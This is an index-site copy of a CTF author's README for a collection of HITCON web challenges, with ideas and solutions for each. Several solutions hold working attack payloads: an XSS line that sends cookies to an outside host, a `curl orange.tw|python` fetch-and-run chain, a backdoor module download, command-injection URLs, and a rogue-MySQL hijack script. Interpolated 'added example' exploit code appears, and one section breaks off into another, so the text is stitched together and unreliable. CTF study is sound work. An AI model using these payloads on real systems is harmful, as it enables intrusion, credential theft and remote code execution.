Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/orangetw/my-ctf-web-challenges
Collection of CTF Web challenges I made
Last synced: 27 days ago
- Host: GitHub
- URL: https://github.com/orangetw/my-ctf-web-challenges
- Owner: orangetw
- Created: 2016-10-12T17:57:17.000Z (about 8 years ago)
- Default Branch: master
- Last Pushed: 2023-11-08T09:07:46.000Z (about 1 year ago)
- Last Synced: 2024-10-15T04:42:13.552Z (27 days ago)
- Language: PHP
- Size: 59.1 MB
- Stars: 2,676
- Watchers: 142
- Forks: 476
- Open Issues: 3
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-security-collection - **1748** stars
README
# My CTF Web Challenges
This is the repository of all CTF challenges I made, including the source code, write-up and idea explanation!
Hope you like it :)

**P.s.** BTW, the `Babyfirst` series and `One Line PHP Challenge` are my favorite challenges. If you don't have enough time, please look at those at least!
* [Babyfirst](#babyfirst)
* [Babyfirst Revenge](#babyfirst-revenge)
* [Babyfirst Revenge v2](#babyfirst-revenge-v2)
* [One Line PHP Challenge](#one-line-php-challenge)
And you can find me via:
* Email: [email protected]
* Blog: [http://blog.orange.tw](http://blog.orange.tw/)
* Twitter: [@orange_8361](https://twitter.com/orange_8361)
## **Table of Contents**
* [HITCON 2021](#W3rmup-PHP)
    * [W3rmup PHP](#W3rmup-PHP)
    * [One-Bit Man](#One-Bit-Man)
    * [Metamon Verse](#Metamon-Verse)
    * [FBI Warning](#FBI-Warning)
    * [Vulpixelize](#Vulpixelize)
* [HITCON 2020](#oShell)
    * [oShell](#oShell)
    * [oStyle](#oStyle)
    * [Return of Use-After-Flee](#return-of-use-after-flee)
* [HITCON 2019 Quals](#virtual-public-network)
    * [Virtual Public Network](#virtual-public-network)
    * [Bounty Pl33z](#bounty-pl33z)
    * [GoGo PowerSQL](#gogo-powersql)
    * [Luatic](#luatic)
    * [Buggy .Net](#buggy-net)
* [HITCON 2018](#one-line-php-challenge)
    * [One Line PHP Challenge](#one-line-php-challenge)
    * [Baby Cake](#baby-cake)
    * [Oh My Raddit](#oh-my-raddit)
    * [Oh My Raddit v2](#oh-my-raddit-v2)
    * [Why so Serials?](#why-so-serials)
* [HITCON 2017 Quals](#babyfirst-revenge)
    * [BabyFirst Revenge](#babyfirst-revenge)
    * [BabyFirst Revenge v2](#babyfirst-revenge-v2)
    * [SSRFme?](#ssrfme)
    * [SQL so Hard](#sql-so-hard)
    * [Baby^H Master PHP 2017](#babyh-master-php-2017)
* [HITCON 2016 Quals](#papapa)
    * [%%%](#papapa)
    * [Leaking](#leaking)
    * [BabyTrick](#babytrick)
    * [Angry Boy](#angry-boy)
    * [Angry Seam](#angry-seam)
* [HITCON 2015 Quals](#babyfirst)
    * [Babyfirst](#babyfirst)
    * [nanana](#nanana)
    * [Giraffe's Coffee](#giraffes-coffee)
    * [lalala](#lalala)
    * [Use-After-FLEE](#use-after-flee)
* [HITCON 2014 Quals](#pushincat)
    * [PUSHIN CAT](#pushincat)
    * [PY4H4SHER](#py4h4sher)
    * [LEENODE](#leenode)
* [WCTF 2016](#blackbox)
    * [BlackBox](#blackbox)
* [AIS3 2015 Final](#sqlpwn)
    * [SQLPWN](#sqlpwn)
## **W3rmup PHP**
Difficulty: **★★**
Solved: **22 / 666**
Tag: **PHP**, **Code Review**, **YAML**, **Command Injection**
#### Source Code
* [Source](hitcon-ctf-2021/W3rmup-PHP/)
#### Idea
* [The Norway Problem](https://hitchdev.com/strictyaml/why/implicit-typing-removed/): under YAML 1.1 implicit typing, the country code of Norway (`NO`) is parsed as the boolean `false`
* Bypass `escapeshellarg` through a logic flaw in how `count()` and `unset()` are combined
#### Solution
* TBD
#### Write Ups
* TBD
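The implicit-typing behaviour behind the first idea above, as an added example that is not part of the challenge source: the YAML 1.1 `bool` regex from the type repository (the same set PyYAML's default resolver uses), a resolver that reports what a plain scalar silently becomes, and a small linter for `key: value` lines. The sample document is constructed; it uses no YAML library so it runs offline.

```python
import re

# YAML 1.1 "bool" implicit-typing regex (yaml.org/type/bool.html). A plain
# scalar matching it is a boolean, so `code: NO` parses as false, not "NO".
YAML11_BOOL = re.compile(
    r'^(?:y|Y|yes|Yes|YES|n|N|no|No|NO'
    r'|true|True|TRUE|false|False|FALSE'
    r'|on|On|ON|off|Off|OFF)$'
)
# YAML 1.2 core schema keeps only these spellings.
YAML12_BOOL = re.compile(r'^(?:true|True|TRUE|false|False|FALSE)$')

TRUE_WORDS = {'y', 'yes', 'true', 'on'}


def implicit_bool(scalar: str, schema: str = '1.1'):
    """Return the bool a *plain* scalar resolves to, or None if it stays a string.

    Quoted scalars ('NO', "NO") are always strings in both schemas.
    """
    s = scalar.strip()
    if len(s) >= 2 and s[0] == s[-1] and s[0] in '\'"':
        return None
    pattern = YAML11_BOOL if schema == '1.1' else YAML12_BOOL
    if not pattern.match(s):
        return None
    return s.lower() in TRUE_WORDS


def lint_norway_problem(doc: str, schema: str = '1.1'):
    """Scan simple `key: value` lines and report values that silently become booleans.

    Returns a list of (line number, key, raw value, coerced bool).
    """
    findings = []
    for lineno, line in enumerate(doc.splitlines(), 1):
        m = re.match(r'^\s*([^#:\s][^:]*):\s*(\S.*)$', line)
        if not m:
            continue
        key = m.group(1).lstrip('- ').strip()
        value = m.group(2).strip()
        coerced = implicit_bool(value, schema)
        if coerced is not None:
            findings.append((lineno, key, value, coerced))
    return findings


# Constructed sample: a country list where a code collides with a YAML 1.1 boolean.
SAMPLE = """\
countries:
  - code: NO
    name: Norway
  - code: 'NO'
    name: Norway (quoted, safe)
  - code: SE
    name: Sweden
enabled: yes
"""

if __name__ == '__main__':
    for lineno, key, value, coerced in lint_norway_problem(SAMPLE):
        print(f"line {lineno}: {key}: {value!r} -> {coerced} (quote it to keep a string)")
```

The fix on the producing side is to quote any value that is meant to be a string; on the consuming side, a YAML 1.2 loader (or strictyaml, which the linked page describes) does not have this class of surprise.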
## **One-Bit Man**
Difficulty: **★**
Solved: **49 / 666**
Tag: **PHP**, **Code Review**
#### Source Code
* [Source](hitcon-ctf-2021/One-Bit-Man/)
#### Idea
You can flip one bit in any file of the latest WordPress release, and you have to pwn the server.
#### Solution
Flip position `5389` of the file `/var/www/html/wp-includes/user.php` to turn the NOT (`!`) operator into a no-op, so the password check is inverted and any wrong password is accepted.
```php
if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) {
return new WP_Error(
```
#### Write Ups
* TBD
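The flip itself, as an added example (not the challenge's own solution code): `!` is 0x21 and a space is 0x20, so clearing the lowest bit of that one byte rewrites `if ( ! wp_check_password(...) )` into `if ( wp_check_password(...) )`. The bit-index convention (byte offset times 8 plus bit number, LSB first) is an assumption; the page does not say how it counts `5389`. The snippet is the two lines quoted above.

```python
SNIPPET = (
    b"if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) {\n"
    b"    return new WP_Error(\n"
)


def flip_bit(data: bytes, bit_index: int) -> bytes:
    """Flip one bit. bit_index = byte_offset * 8 + bit, bit 0 being the LSB
    (assumed convention; the page does not state how position 5389 is counted)."""
    byte_off, bit = divmod(bit_index, 8)
    buf = bytearray(data)
    buf[byte_off] ^= 1 << bit
    return bytes(buf)


def neutralise_not(src: bytes, needle: bytes = b"if ( ! ") -> tuple:
    """Locate the `!` of the condition and flip its LSB: 0x21 '!' ^ 0x01 = 0x20 ' '.
    The test becomes `if ( wp_check_password(...) )`: a correct password now hits
    the error branch and any wrong password is accepted. Returns (bit_index, patched)."""
    off = src.index(needle) + needle.index(b"!")
    bit_index = off * 8
    return bit_index, flip_bit(src, bit_index)


def one_flip_neighbours(ch: str) -> list:
    """Printable ASCII characters one bit-flip away from ch (shows why ' ' is reachable from '!')."""
    b = ord(ch)
    return sorted(chr(b ^ (1 << i)) for i in range(7) if 0x20 <= (b ^ (1 << i)) < 0x7F)


def flip_bit_in_file(path: str, bit_index: int) -> None:
    """Apply the flip in place; for the challenge this is the entire exploit."""
    with open(path, 'rb') as f:
        data = f.read()
    with open(path, 'wb') as f:
        f.write(flip_bit(data, bit_index))


if __name__ == '__main__':
    idx, patched = neutralise_not(SNIPPET)
    print(idx)
    print(patched.decode())
```

Defensively, a change like this is invisible to anything that only watches for new files; comparing core files against the published checksums (WP-CLI's `wp core verify-checksums`) is what catches a one-byte edit to `user.php`.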
## **Metamon Verse**
Difficulty: **★★★☆**
Solved: **9 / 666**
Tag: **NFS**, **SSRF**, **RCE**
#### Source Code
* [Source](hitcon-ctf-2021/Metamon-Verse/)
#### Idea
The idea is to use the SSRF to talk to the local NFS/RPC services and turn that into RCE. To complete the exploit, you have to:
1. Construct an `RPC/PORTMAP_CALL` packet and send it to `gopher://127.0.0.1:111/` to learn the port of the `mountd` service.
2. Construct an `RPC/MNT_CALL` packet and send it to `gopher://127.0.0.1:<port from step 1>/` to get the file handle of the `/data` volume (remember to set `CURLOPT_LOCALPORT` so the connection comes from a privileged source port, which is what passes the server's authentication).
3. Construct an `RPC/NFS_CALL` packet and send it to `gopher://127.0.0.1:2049/` to create a SYMLINK (again with `CURLOPT_LOCALPORT`).
4. Symlink `/app/templates/index.html` to a file you control to get SSTI, and from there RCE!
#### Solution
A quick-and-dirty exploit can be found [here](https://gist.github.com/orangetw/6d34ff98a6332bc0523b35ea952a790d)
#### Write Ups
* TBD
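The wire format behind steps 1 and 2, as an added example (not the gist linked above): an ONC RPC (RFC 5531) CALL builder with the TCP record mark, a `PMAPPROC_GETPORT` request for `mountd`, a `MOUNTPROC3_MNT` request carrying an AUTH_UNIX credential that claims uid 0, a parser for the GETPORT reply, and the `gopher://` encoding curl needs to deliver raw bytes. The program numbers and procedure numbers are the standard ones; the reply bytes are constructed so the parser can be exercised offline.

```python
import struct

# ONC RPC program/procedure numbers used in the chain above
PMAP_PROG, PMAP_VERS, PMAPPROC_GETPORT = 100000, 2, 3
MOUNT_PROG, MOUNT_VERS, MOUNTPROC_MNT = 100005, 3, 1
IPPROTO_TCP, IPPROTO_UDP = 6, 17
AUTH_NONE, AUTH_UNIX = 0, 1
RPC_CALL, RPC_REPLY = 0, 1


def xdr_opaque(data: bytes) -> bytes:
    """XDR variable-length opaque: 4-byte length, payload, zero padding to a 4-byte boundary."""
    return struct.pack('>I', len(data)) + data + b'\x00' * ((-len(data)) % 4)


def auth_none() -> bytes:
    return struct.pack('>II', AUTH_NONE, 0)


def auth_unix(uid=0, gid=0, machine=b'localhost') -> bytes:
    """AUTH_UNIX credential: stamp, machine name, uid, gid, empty gids list.
    The server takes these claims at face value; with `secure` exports it checks
    the source port (< 1024) instead, hence CURLOPT_LOCALPORT in the chain above."""
    body = struct.pack('>I', 0) + xdr_opaque(machine) + struct.pack('>III', uid, gid, 0)
    return struct.pack('>I', AUTH_UNIX) + xdr_opaque(body)


def rpc_call(xid, prog, vers, proc, args: bytes, cred: bytes = None) -> bytes:
    """RFC 5531 CALL message, prefixed with the TCP record mark (high bit = last fragment)."""
    msg = struct.pack('>IIIIII', xid, RPC_CALL, 2, prog, vers, proc)
    msg += (cred or auth_none()) + auth_none() + args   # credential, verifier, arguments
    return struct.pack('>I', 0x80000000 | len(msg)) + msg


def build_getport_call(xid, prog, vers, prot=IPPROTO_TCP) -> bytes:
    """Step 1: PMAPPROC_GETPORT(prog, vers, prot, port=0) for the portmapper on 111."""
    return rpc_call(xid, PMAP_PROG, PMAP_VERS, PMAPPROC_GETPORT,
                    struct.pack('>IIII', prog, vers, prot, 0))


def build_mnt_call(xid, path: bytes, uid=0) -> bytes:
    """Step 2: MOUNTPROC3_MNT(dirpath) with an AUTH_UNIX credential claiming root."""
    return rpc_call(xid, MOUNT_PROG, MOUNT_VERS, MOUNTPROC_MNT, xdr_opaque(path), auth_unix(uid))


def parse_getport_reply(data: bytes) -> int:
    """Extract the port from an accepted GETPORT reply (record mark included)."""
    (mark,) = struct.unpack('>I', data[:4])
    body = data[4:4 + (mark & 0x7FFFFFFF)]
    xid, msg_type, reply_stat = struct.unpack('>III', body[:12])
    if msg_type != RPC_REPLY or reply_stat != 0:
        raise ValueError('RPC message denied or malformed')
    _flavor, verf_len = struct.unpack('>II', body[12:20])
    off = 20 + verf_len + ((-verf_len) % 4)
    (accept_stat,) = struct.unpack('>I', body[off:off + 4])
    if accept_stat != 0:
        raise ValueError('accept_stat=%d' % accept_stat)
    return struct.unpack('>I', body[off + 4:off + 8])[0]


def gopher_url(host: str, port: int, payload: bytes) -> str:
    """curl sends the selector after the one-character gopher type byte, percent-decoded,
    then CRLF; the CRLF arrives after our complete RPC record, so the call is still served."""
    return 'gopher://%s:%d/_%s' % (host, port, ''.join('%%%02x' % b for b in payload))


# Constructed GETPORT reply (xid 0x1337, MSG_ACCEPTED, SUCCESS, port 20048) for offline parsing.
SAMPLE_REPLY = (struct.pack('>I', 0x80000000 | 28)
                + struct.pack('>III', 0x1337, RPC_REPLY, 0)   # xid, REPLY, MSG_ACCEPTED
                + struct.pack('>II', AUTH_NONE, 0)            # verifier
                + struct.pack('>I', 0)                        # accept_stat SUCCESS
                + struct.pack('>I', 20048))                   # mountd port

if __name__ == '__main__':
    print(gopher_url('127.0.0.1', 111, build_getport_call(0x1337, MOUNT_PROG, MOUNT_VERS)))
    print('mountd on port', parse_getport_reply(SAMPLE_REPLY))
```

The MNT reply carries the file handle the NFS SYMLINK call in step 3 needs; that call is built the same way against program 100003 on port 2049, with the same AUTH_UNIX credential and the same low source port.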
## **FBI Warning**
Difficulty: **☆**
Solved: **25 / 666**
Tag: **MISC**, **OSINT**, **PHP**, **Code Review**
#### Source Code
* [Source](hitcon-ctf-2021/FBI-Warning/)
#### Idea
The website uses the well-known message board project [futaba-ng](https://github.com/futoase/futaba-ng), whose poster ID is derived from `REMOTE_ADDR`:
```php
define("IDSEED", 'idの種'); //idの種
...
$now.=" ID:".substr(crypt(md5($_SERVER["REMOTE_ADDR"].IDSEED.gmdate("Ymd", $time+9*60*60)),'id'),-8);
```
#### Solution
Because the IP prefix is known (OSINT), you can brute-force the IP address of Ωrange easily:
```php
var_dump( substr(crypt(md5("219.91.64.47"."idの種"."20211203"),"id"),-8) == "ueyUrcwA" )
// bool(true)
```
#### Write Ups
* TBD
## **Vulpixelize**
Difficulty: **★☆**
Solved: **41 / 666**
Tag: **Browser**, **Feature**
#### Source Code
* [Source](hitcon-ctf-2021/Vulpixelize/)
#### Idea
Use the new Chrome feature [Text Fragments](https://wicg.github.io/scroll-to-text-fragment/) to extract the flag.
#### Solution
* TBD
#### Write Ups
* TBD
## **oShell**
Difficulty: **★★**
Solved: **21 / 1281**
Tag: **BlackBox**, **Shell**, **Command Injection**
#### Source Code
* [Source](hitcon-ctf-2020/oShell/)
#### Solution
1. Leverage `strace` from `htop` to read the enable secret.
2. Write `/home/oShell/.toprc` with `tcpdump -w`.
3. Abuse the `top` inspect feature to run arbitrary commands.
#### Write Ups
* [Writeup from team FrenchRoomba](https://github.com/FrenchRoomba/ctf-writeup-HITCON-CTF-2020/tree/master/oShell)
## **oStyle**
Difficulty: **★★☆**
Solved: **10 / 1281**
Tag: **XSS**
#### Source Code
* [Source](hitcon-ctf-2020/oStyle/)
#### Solution
* The default Apache installation enables `mod_negotiation`, whose `.var` type maps let you serve a body with an arbitrary `Content-type`:
**test.var**
```
Content-language: en
Content-type: text/html
Body:----foo----
<script>fetch('http://orange.tw/?' + escape(document.cookie))</script>
----foo----
```
#### Write Ups
* TBD
## **Return of Use-After-Flee**
Difficulty: **★★★★★**
Solved: **0 / 1281**
Tag: **WhiteBox**, **PHP**, **UAF**, **PWN**
#### Source Code
* [Source](hitcon-ctf-2020/Return-of-Use-After-Flee/)
#### Solution
* Exploit `CVE-2015-0273` to pop a shell without known binaries. More details will be published on [my blog](http://blog.orange.tw/) soon.
#### Write Ups
* TBD
## **Virtual Public Network**
Difficulty: **★☆**
Solved: **81 / 1147**
Tag: **WhiteBox**, **Perl**, **Command Injection**
#### Source Code
* [Source](hitcon-ctf-2019/virtual-public-network/)
#### Solution
* Refer to my blog and Black Hat USA 2019 slides for details
    * [Attacking SSL VPN - Part 3: The Golden Pulse Secure SSL VPN RCE Chain, with Twitter as Case Study!](https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html)
    * [Infiltrating Corporate Intranet Like NSA: Pre-auth RCE on Leading SSL VPNs](https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf)

```
http://13.231.137.9/cgi-bin/diag.cgi
?options=-r@a="ls -alh /",system@a%23 2>tmp/orange.thtml <
&tpl=orange
```
#### Write Ups
* TBD
## **Bounty Pl33z**
Difficulty: **★★★☆**
Solved: **30 / 1147**
Tag: **XSS**
#### Source Code
* [Website](hitcon-ctf-2019/bounty-pl33z/www/)
* [XSS bot](hitcon-ctf-2019/bounty-pl33z/bot/)
#### Solution
* Idea from [@FD](https://twitter.com/filedescriptor): the little-known HTML-like JavaScript comments [SingleLineHTMLOpenComment](https://www.ecma-international.org/ecma-262/10.0/index.html#prod-annexB-SingleLineHTMLOpenComment) and [HTMLCloseComment](https://www.ecma-international.org/ecma-262/10.0/index.html#prod-annexB-HTMLCloseComment) from Annex B of the ECMAScript specification.
Here we use the Unicode characters `U+2028` (line separator) and `U+3002` (ideographic full stop) to bypass the `\n` and `.` filters.
```
http://3.114.5.202/fd.php
?q=ssl。orange。tw?xx"%2bdocument[`cookie`]%E2%80%A8-->
```
#### Unintended Solution
* Nested template literals
```
http://3.114.5.202/fd.php
?q=ssl。orange。tw?`%2b"%2bdocument[`cookie`];(`${`
```
#### Write Ups
* TBD
## **GoGo PowerSQL**
Difficulty: **★★★☆**
Solved: **16 / 1147**
Tag: **Environment Injection**, **MySQL Client Attack**
#### Source Code
* [Docker](hitcon-ctf-2019/gogo-powersql/)
#### Solution
1. Overflow the `DB_HOST` buffer in `.bss`
2. Because of the [patch](hitcon-ctf-2019/gogo-powersql/Dockerfile#L20), we can inject environment variables that are not on the [blacklist](https://github.com/embedthis/goahead/blob/v4.0.0/src/cgi.c#L170).
3. Hijack the MySQL connection through environment variables such as `LOCALDOMAIN` or `HOSTALIASES`
4. Read `/FLAG` with `LOAD DATA LOCAL INFILE`.

```python
import requests

# steps 1-3: pad the query string, then point HOSTALIASES at the CGI's stdin,
# i.e. the POST body, so the hostname alias file is attacker-controlled
payload = ['x=x' for x in range(254)]
payload.append('name=x')
payload.append('HOSTALIASES=/proc/self/fd/0')
payload.append('orangeeeee=go')
payload = '&'.join(payload)

# alias file content in HOSTALIASES format (`alias hostname`): the DB host
# now resolves to the attacker's rogue MySQL server
data = 'orangeeeee my.orange.tw'
r = requests.post('http://13.231.38.172/cgi-bin/query?' + payload, data=data)
print(r.content)
```

```shell
$ git clone https://github.com/lcark/MysqlClientAttack.git
$ cd MysqlClientAttack
$ python main.py -F /FLAG
```
#### Write Ups
* TBD
## **Luatic**
Difficulty: **★★☆**
Solved: **42 / 1147**
Tag: **WhiteBox**, **Redis**, **Lua**
#### Source Code
* [Docker](hitcon-ctf-2019/luatic/)
#### Solution
1. Override PHP global variables.
2. Redis [implements](https://github.com/antirez/redis/blob/ee1cef189fff604f165b2d20a307545840de944e/src/scripting.c#L1363) the `eval` command by string concatenation, so we can break out of the generated Lua function and override global objects.

```
http://54.250.242.183/luatic.php
?_POST[TEST_KEY]=return 1 end function math:random() return 2
&_POST[TEST_VALUE]=0
&_POST[MY_SET_COMMAND]=eval
&_POST[token]=
&_POST[guess]=2
```

```
http://54.250.242.183/luatic.php
?_POST[token]=
&_POST[guess]=2
```
#### Unintended Solution
* Lua is so magic that there are several unintended solutions. Sorry for the imperfect challenge :(
#### Write Ups
* TBD
## **Buggy .Net**
Difficulty: **★☆**
Solved: **13 / 1147**
Tag: **ASP.NET**, **WhiteBox**
#### Source Code
* [Default.aspx](hitcon-ctf-2019/buggy-net/Default.aspx)
#### Solution
* Use .NET request validation to trigger an exception and bypass the filter
* Idea from [Soroush Dalili](https://twitter.com/irsdl)'s [WAF Bypass Techniques - Using HTTP Standard and Web Servers' Behaviour](https://www.slideshare.net/SoroushDalili/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour) from AppSec Europe 2018 (pp. 30-34)

```
GET / HTTP/1.1
Host: buggy
Content-Type: application/x-www-form-urlencoded; charset=ibm500
Content-Length: 61

%86%89%93%85%95%81%94%85=KKaKKa%C6%D3%C1%C7K%A3%A7%A3&x=L%A7n
```

```python
from urllib.parse import quote

# encode each value as IBM500 (EBCDIC) before percent-encoding; the request
# above is `filename=../../FLAG.txt&x=<x>` in that charset
s = lambda x: quote(x.encode('ibm500'))
print('%s=%s&x=%s' % (s('filename'), s('../../FLAG.txt'), s('<x>')))
```
#### Write Ups
* TBD
## **One Line PHP Challenge**
Difficulty: **★★★★**
Solved: **3 / 1816**
Tag: **PHP**
#### Source Code
* [index.php](hitcon-ctf-2018/one-line-php-challenge/src/index.php)
#### Solution
P.S. This is a default installation of PHP 7.2 + Apache on Ubuntu 18.04
1. Control partial session file content by `PHP_SESSION_UPLOAD_PROGRESS`
2. Bypass `session.upload_progress.cleanup = On` by `race condition` or `slow query`
3. Control the prefix to `@g` to file "_"

## **BabyFirst Revenge**
#### Solution
```
http://host/?cmd=>ls\
http://host/?cmd=ls>_
http://host/?cmd=>\ \
http://host/?cmd=>-t\
http://host/?cmd=>\>g
http://host/?cmd=ls>>_

# generate `curl orange.tw|python` to file "g"
http://host/?cmd=>on
http://host/?cmd=>th\
http://host/?cmd=>py\
http://host/?cmd=>\|\
http://host/?cmd=>tw\
http://host/?cmd=>e.\
http://host/?cmd=>ng\
http://host/?cmd=>ra\
http://host/?cmd=>o\
http://host/?cmd=>\ \
http://host/?cmd=>rl\
http://host/?cmd=>cu\
http://host/?cmd=sh _

# got shell
http://host/?cmd=sh g
```
You can check the [exploit.py](hitcon-ctf-2017/babyfirst-revenge/exploit.py) for the details! There are also lots of creative solutions; see the write-ups below.
#### Write Ups
* [HITCON CTF 2017-BabyFirst Revenge-writeup](https://chybeta.github.io/2017/11/04/HITCON-CTF-2017-BabyFirst-Revenge-writeup/)
* [HITCON CTF 2017-BabyFirst Revenge-writeup (Via curl)](http://www.jianshu.com/p/82788b6949c7)
* [HITCON 2017 CTF BabyFirst Revenge](https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/)
* [HITCON CTF 2017 - BabyFirst Revenge (172 pts.)](https://kimtruth.github.io/2017/11/06/HITCON-CTF-2017-BabyFirst-Revenge-172-pts/)
* [Hitcon CTF 2017 - Baby Revenge](https://theromanxpl0it.github.io/ctf_hitcon2017/babyrevenge/)
* [Hitcon CTF 2017 Quals: Baby First Revenge (web 172) (Via xxd)](https://losfuzzys.github.io/writeup/2017/11/06/hitconctf-babyfirstrevenge/)
* [HITCON CTF 2017 BabyFirst Revenge & v2 writeup](https://findneo.github.io/2017/11/HITCON-CTF-2017-Babyfirst-Revenge-series-writeup/)
* [BabyFirst-Revenge-HITCOIN-2017-QUALS by @n4p5ter](https://github.com/n4p5ter/BabyFirst-Revenge-HITCOIN-2017-QUALS)
## **BabyFirst Revenge v2**
Difficulty: **★★★★**
Solved: **8 / 1541**
Tag: **WhiteBox**, **PHP**, **Command Injection**
#### Idea
* Command Injection, but only in **4** bytes
#### Source Code
* [index.php](hitcon-ctf-2017/babyfirst-revenge-v2/index.php)
#### Solution
1. generate `g> ht- sl` to file `v`
2. reverse file `v` to file `x`
3. generate `curl orange.tw|python;`
4. execute `x`, `ls -th >g`
5. execute `g`

You can check [exploit.py](hitcon-ctf-2017/babyfirst-revenge-v2/exploit.py) for the details!
#### Write Ups
* [Baby First Revenge v2 (Via vim) by @bennofs](https://github.com/bennofs/docs/blob/master/hitcon-2017/baby-first-revenge2.md)
* [\[python\] baby-exp.py](https://codegists.com/snippet/python/baby-exppy_beched_python)
* [How to solve a CTF challenge for $20 - HITCON 2017 BabyFirst Revenge v2](https://www.eugenekolo.com/blog/hitcon-babyfirst-revenge-v2/)
* [HITCON CTF 2017 BabyFirst Revenge & v2 writeup](https://findneo.github.io/2017/11/HITCON-CTF-2017-Babyfirst-Revenge-series-writeup/)
## **SSRFme?**
Difficulty: **★★☆**
Solved: **20 / 1541**
Tag: **WhiteBox**, **Perl**, **PATH Pollution**
#### Idea
* [CVE-2016-1238](https://perl5.git.perl.org/perl.git/commit/cee96d52c39b1e7b36e1c62d38bcd8d86e9a41ab) (but the latest Ubuntu 17.04 image on AWS is still vulnerable)
* Perl looks up the current directory when importing modules
* The Perl module [URI/lib/URI.pm#L136](https://github.com/libwww-perl/URI/blob/b7680860f323a0cf3ffe5f6bdb684646e1ecac33/lib/URI.pm#L136) will `eval` when it meets an unknown scheme
#### Source Code
* [index.php](hitcon-ctf-2017/ssrfme/index.php)
```bash
$ sudo apt install libwww-perl
```
#### Solution
```bash
# write evil URI module to current directory
$ curl 'http://host/?filename=URI/orange.pm&url=http://orange.tw/w/backdoor.pl'

# eval evil module `orange`
$ curl 'http://host/?filename=xxx&url=orange://orange.tw'
```
#### Write Ups
* [Another Solution by @Paul_Axe](https://twitter.com/Paul_Axe/status/927669724439293953)
* [HITCON 2017 SSRFme](https://ricterz.me/posts/HITCON%202017%20SSRFme)
* [SSRFme by @sorgloomer](https://github.com/sorgloomer/writeups/blob/master/writeups/2017-hitcon-quals/ssrfme.md)
## **SQL so Hard**
Difficulty: **★★★**
Solved: **10 / 1541**
Tag: **WhiteBox**, **MySQL**, **PostgreSQL**, **SQL Injection**, **Code Injection**
#### Idea
* MySQL drops SQL statements larger than `max_allowed_packet`
* [Node-Postgres - code execution vulnerability](https://node-postgres.com/announcements#2017-08-12-code-execution-vulnerability)
* Exploit the RCE through SQL `UPDATE` syntax
#### Source Code
* [app.js](hitcon-ctf-2017/sql-so-hard/app.js)
#### Solution
* [exploit.py](hitcon-ctf-2017/sql-so-hard/exploit.py)
#### Write Ups
* [SQL so Hard by @sorgloomer](https://github.com/sorgloomer/writeups/blob/master/writeups/2017-hitcon-quals/sql-so-hard.md)
## **Baby^H Master PHP 2017**
Difficulty: **★★★★☆**
Solved: **0 / 1541**
Tag: **WhiteBox**, **PHP**, **Serialization**, **Apache Prefork**
#### Idea
* PHP deserializes the metadata when it parses a `PHAR` archive
* PHP assigns a predictable name, `\x00lambda_%d`, to an anonymous function
* Break shared VARIABLE state in Apache pre-fork mode
#### Source Code
* [index.php](hitcon-ctf-2017/baby^h-master-php-2017/index.php)
#### Solution
```bash
# get a cookie
$ curl http://host/ --cookie-jar cookie

# download .phar file from http://orange.tw/avatar.gif
$ curl -b cookie 'http://host/?m=upload&url=http://orange.tw/'

# force apache to fork new process
$ python fork.py &

# get flag
$ curl -b cookie "http://host/?m=upload&url=phar:///var/www/data/$MD5_IP/&lucky=%00lambda_1"
```
* [avatar.gif](hitcon-ctf-2017/baby^h-master-php-2017/avatar.gif)
* [fork.py](hitcon-ctf-2017/baby^h-master-php-2017/fork.py)
#### Write Ups
* [По умолчанию Чтение файлов => unserialize !](https://rdot.org/forum/showthread.php?t=4379)
## **papapa**
Difficulty: **★**
Solved: **71 / 1024**
Tag: **BlackBox**, **SSL**, **Pentesting**
#### Idea
* Leak the internal hostname from SSL certificate
#### Source Code
* [here](hitcon-ctf-2016/papapa)
#### Solution
```bash
$ openssl s_client -showcerts -connect 1.2.3.4:443 < /dev/null | openssl x509 -text | grep -A 1 "Subject Alternative Name"
...
depth=0 C = TW, ST = Some-State, O = Internet Widgits Pty Ltd, CN = very-secret-area-for-ctf.orange.tw, emailAddress = [email protected]
...
# get flag
$ curl -k -H "Host: very-secret-area-for-ctf.orange.tw" https://1.2.3.4/
```
#### Write Ups
* [HITCON 2016](https://dinhbaoluciusteam.wordpress.com/2016/10/10/hitcon-2016/)
* [HITCON CTF 2016: %%% (Web) Write-up](http://icheernoom.blogspot.tw/2016/10/hitcon-ctf-2016-web-write-up.html)
* [\[HITCON 2016\] \[WEB 100 - %%%\] WRITE UP](https://0x90r00t.com/2016/10/10/hitcon-2016-web-100-write-up/)
* [hitcon2016 web writeup](http://lorexxar.cn/2016/10/10/hitcon2016/)
## **Leaking**
Difficulty: **★★**
Solved: **43 / 1024**
Tag: **WhiteBox**, **JavaScript**, **NodeJS**
#### Idea
* Break JavaScript Sandbox
* Use NodeJS `Buffer(int)` to steal uninitialized memory
* [Node.js Buffer knows everything](https://github.com/ChALkeR/notes/blob/master/Buffer-knows-everything.md)
#### Source Code
* [here](hitcon-ctf-2016/leaking)
#### Solution
```bash
$ while true; do curl 'http://1.2.3.4/?data=Buffer(1e4)' | grep -a hitcon; done
```
#### Write Ups
* [Hello HitCon 2016 CTF](https://ctfs.ghost.io/hello-hitcon-2016-ctf/#leaking)
* [HITCON 2016 web 总结](http://0x48.pw/2016/10/14/0x24/)
* [hitcon2016 web writeup](http://lorexxar.cn/2016/10/10/hitcon2016/)
## **BabyTrick**
Difficulty: **★★★**
Solved: **24 / 1024**
Tag: **WhiteBox**, **PHP**, **MySQL**, **SQL Injection**, **Unserialize**
#### Idea
* [Create an Unexpected Object and Don't Invoke \_\_wakeup() in Deserialization](https://bugs.php.net/bug.php?id=72663)
* [SugarCRM v6.5.23 PHP反序列化對象注入漏洞](http://blog.knownsec.com/2016/09/sugarcrm-v6-5-23-php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AF%B9%E8%B1%A1%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/)
* MySQL's default utf8 collation (`utf8_general_ci`) is case- and accent-insensitive: `SELECT 'Ä'='a'` is true
#### Source Code
* [here](hitcon-ctf-2016/babytrick)
#### Solution
